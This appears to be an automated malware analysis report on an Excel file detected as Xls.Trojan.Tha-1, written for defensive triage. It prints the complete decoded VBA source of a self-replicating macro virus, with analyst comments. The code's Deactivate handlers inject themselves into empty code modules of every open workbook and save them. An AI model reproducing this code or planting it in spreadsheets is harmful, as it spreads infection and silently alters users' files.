Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 9840232944f6ca7f…

MALICIOUS

Office (OLE)

33.5 KB Created: 1999-02-06 16:40:14 Authoring application: Microsoft Excel First seen: 2012-06-14
MD5: b19e75948a2be7972925ace9fdb29eca SHA-1: 1b3a32b4cf51480981fafb0b88cfb2d53c5c7cba SHA-256: 9840232944f6ca7f0d95256e0e61ca89d554782487ec9db9b7203c0a6c34c089
140 Risk Score

Malware Insights

MITRE ATT&CK
T1059.005 Visual Basic

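The file is an Excel spreadsheet containing VBA macros. The macros are Workbook_Deactivate and Worksheet_Deactivate event handlers that read their own source through the VBA project object model (VBProject.VBComponents, CodeModule) and insert it into every empty code module of every open workbook, then save those workbooks that already had a path on disk and no unsaved changes. This attempt to copy itself into other open workbooks is a common technique for malware to spread or maintain persistence. Current Office versions refuse this object-model access unless "Trust access to the VBA project object model" is enabled, so that setting is worth checking on any host where the file was opened with macros enabled. The ClamAV detection 'Xls.Trojan.Tha-1' further supports its malicious nature. No specific IOCs like URLs or file paths were directly extracted from the macro code.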

Heuristics 2

  • ClamAV: Xls.Trojan.Tha-1 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Xls.Trojan.Tha-1
  • VBA macros detected medium OLE_VBA_MACROS
    Document contains VBA macro code

Extracted artifacts 1

Files carved from inside the sample during analysis.

Filename | Kind | Source | Size
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 10446 bytes
SHA-256: b8ea3830b3d9c16ea9b685221529ed31dfd817c67c3c2bae560a7c76dbbbc62f
Detection
ClamAV: Xls.Trojan.Tha-1
Obfuscation or payload: unlikely
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "DieseArbeitsmappe"
Attribute VB_Base = "0{00020819-0000-0000-C000-000000000046}"
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
Private Sub Workbook_Deactivate()
' Analyst annotation (comments only; the statements are the sample's own).
' Workbook-level Deactivate event handler: Excel runs it when this workbook
' is deactivated, provided macros are enabled.
' Visible behaviour: read the complete source of this workbook's first VBA
' component, insert it into every empty code module of every open workbook,
' then save the workbooks that were already on disk and unmodified.
' The routine contains no network, shell or file-system calls; its only
' effect is self-replication through the VBA project object model.

' Only ThaClass is typed As String; OurCode is left untyped in this
' declaration. The inner loop counter j is never declared.
Dim OurCode, ThaClass As String
Dim i As Integer
Dim Saved As Boolean

' Same string as the VB_Name of the workbook module in this sample.
ThaClass = "DieseArbeitsmappe"

' Copy lines 1..CountOfLines of the first component of the running workbook.
' References to VBProject / VBComponents / CodeModule inside a document macro
' are the self-modification indicator to look for in similar samples.
OurCode = Application.ThisWorkbook.VBProject.VBComponents.Item(1).CodeModule.Lines(1, Application.ThisWorkbook.VBProject.VBComponents.Item(1).CodeModule.CountOfLines)

' Walk every workbook currently open in this Excel instance.
For i = 1 To Application.Workbooks.Count

  ' Local flag, reset per workbook; distinct from the Workbook.Saved property.
  Saved = False
  
  For j = 1 To Application.Workbooks.Item(i).VBProject.VBComponents.Count
  
    ' Only components whose code module is empty are touched, so a module
    ' that already holds code (including an earlier copy) is skipped.
    If Application.Workbooks.Item(i).VBProject.VBComponents.Item(j).CodeModule.CountOfLines = 0 Then
    
      ' Evaluated before the insertion below: remembers that the workbook has
      ' a path on disk and no pending changes.
      ' NOTE(review): presumably so the later Save adds nothing but the
      ' injected code - inferred from statement order, confirm dynamically.
      If Application.Workbooks.Item(i).Path <> "" And Application.Workbooks.Item(i).Saved = True And Saved = False Then Saved = True
    
      ' Write the copied source into the empty module, starting at line 1.
      Application.Workbooks.Item(i).VBProject.VBComponents.Item(j).CodeModule.InsertLines 1, OurCode
      
      ' Rewrite the first line so the procedure header is the workbook-level
      ' event name for a component named ThaClass, and the worksheet-level
      ' event name for every other component.
      If Application.Workbooks.Item(i).VBProject.VBComponents.Item(j).Name = ThaClass Then
        Application.Workbooks.Item(i).VBProject.VBComponents.Item(j).CodeModule.ReplaceLine 1, "Private Sub Workbook_Deactivate()"
      Else
        Application.Workbooks.Item(i).VBProject.VBComponents.Item(j).CodeModule.ReplaceLine 1, "Private Sub Worksheet_Deactivate()"
      End If

    End If
    
  Next j
  
  ' Persist the modified workbook to disk when the flag was set above.
  ' For triage: workbooks open in the same Excel session as the sample, and
  ' already saved at that time, are the ones to inspect for injected modules.
  If Saved = True Then Application.Workbooks.Item(i).Save

Next i

End Sub


Attribute VB_Name = "Tabelle1"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
Private Sub Worksheet_Deactivate()
' Analyst annotation (comments only; the statements are the sample's own).
' Worksheet-level Deactivate event handler in module "Tabelle1": Excel runs
' it when this sheet is deactivated, provided macros are enabled.
' Apart from the procedure header, the body is statement-for-statement the
' same as the Workbook_Deactivate handler in module "DieseArbeitsmappe":
' copy the source of the first VBA component into every empty code module of
' every open workbook, then save workbooks that were on disk and unmodified.
' No network, shell or file-system calls appear in this routine.

' Only ThaClass is typed As String; OurCode is left untyped in this
' declaration. The inner loop counter j is never declared.
Dim OurCode, ThaClass As String
Dim i As Integer
Dim Saved As Boolean

' Same string as the VB_Name of the workbook module in this sample.
ThaClass = "DieseArbeitsmappe"

' The source is taken from VBComponents.Item(1) of the running workbook, not
' necessarily from this sheet module; the header is rewritten after insertion.
OurCode = Application.ThisWorkbook.VBProject.VBComponents.Item(1).CodeModule.Lines(1, Application.ThisWorkbook.VBProject.VBComponents.Item(1).CodeModule.CountOfLines)

' Walk every workbook currently open in this Excel instance.
For i = 1 To Application.Workbooks.Count

  ' Local flag, reset per workbook; distinct from the Workbook.Saved property.
  Saved = False
  
  For j = 1 To Application.Workbooks.Item(i).VBProject.VBComponents.Count
  
    ' Empty code modules only; modules that already contain code are skipped.
    If Application.Workbooks.Item(i).VBProject.VBComponents.Item(j).CodeModule.CountOfLines = 0 Then
    
      ' Checked before the insertion: the workbook has a path on disk and no
      ' pending changes, so the flag marks it for the Save after the loop.
      If Application.Workbooks.Item(i).Path <> "" And Application.Workbooks.Item(i).Saved = True And Saved = False Then Saved = True
    
      ' Write the copied source into the empty module, starting at line 1.
      Application.Workbooks.Item(i).VBProject.VBComponents.Item(j).CodeModule.InsertLines 1, OurCode
      
      ' Line 1 becomes the workbook-level header for a component named
      ' ThaClass and the worksheet-level header for any other component.
      If Application.Workbooks.Item(i).VBProject.VBComponents.Item(j).Name = ThaClass Then
        Application.Workbooks.Item(i).VBProject.VBComponents.Item(j).CodeModule.ReplaceLine 1, "Private Sub Workbook_Deactivate()"
      Else
        Application.Workbooks.Item(i).VBProject.VBComponents.Item(j).CodeModule.ReplaceLine 1, "Private Sub Worksheet_Deactivate()"
      End If

    End If
    
  Next j
  
  ' Persist the modified workbook to disk when the flag was set above.
  If Saved = True Then Application.Workbooks.Item(i).Save

Next i

End Sub


' Processing file: /opt/analyzer/scan_staging/19123c0f9c2b4575accd6b0fb9b788b7.bin
' ===============================================================================
' Module streams:
' _VBA_PROJECT_CUR/VBA/DieseArbeitsmappe - 8856 bytes
' Line #0:
' 	FuncDefn (Private Sub Workbook_Deactivate())
' Line #1:
' Line #2:
' 	Dim 
' 	VarDefn ThisWorkbook
' 	VarDefn id_0292 (As String)
' Line #3:
' 	Dim 
' 	VarDefn _B_var_For (As Integer)
' Line #4:
' 	Dim 
' 	VarDefn Saved (As Boolean)
' Line #5:
' Line #6:
' 	LitStr 0x0011 "DieseArbeitsmappe"
' 	St id_0292 
' Line #7:
' Line #8:
' 	LitDI2 0x0001 
' 	LitDI2 0x0001 
' 	Ld Application 
' 	MemLd Lines 
' 	MemLd VBProject 
' 	MemLd VBComponents 
' 	ArgsMemLd Item 0x0001 
' 	MemLd i 
' 	MemLd _B_var_If 
' 	LitDI2 0x0001 
' 	Ld Application 
' 	MemLd Lines 
' 	MemLd VBProject 
' 	MemLd VBComponents 
' 	ArgsMemLd Item 0x0001 
' 	MemLd i 
' 	ArgsMemLd CountOfLines 0x0002 
' 	S
... (truncated)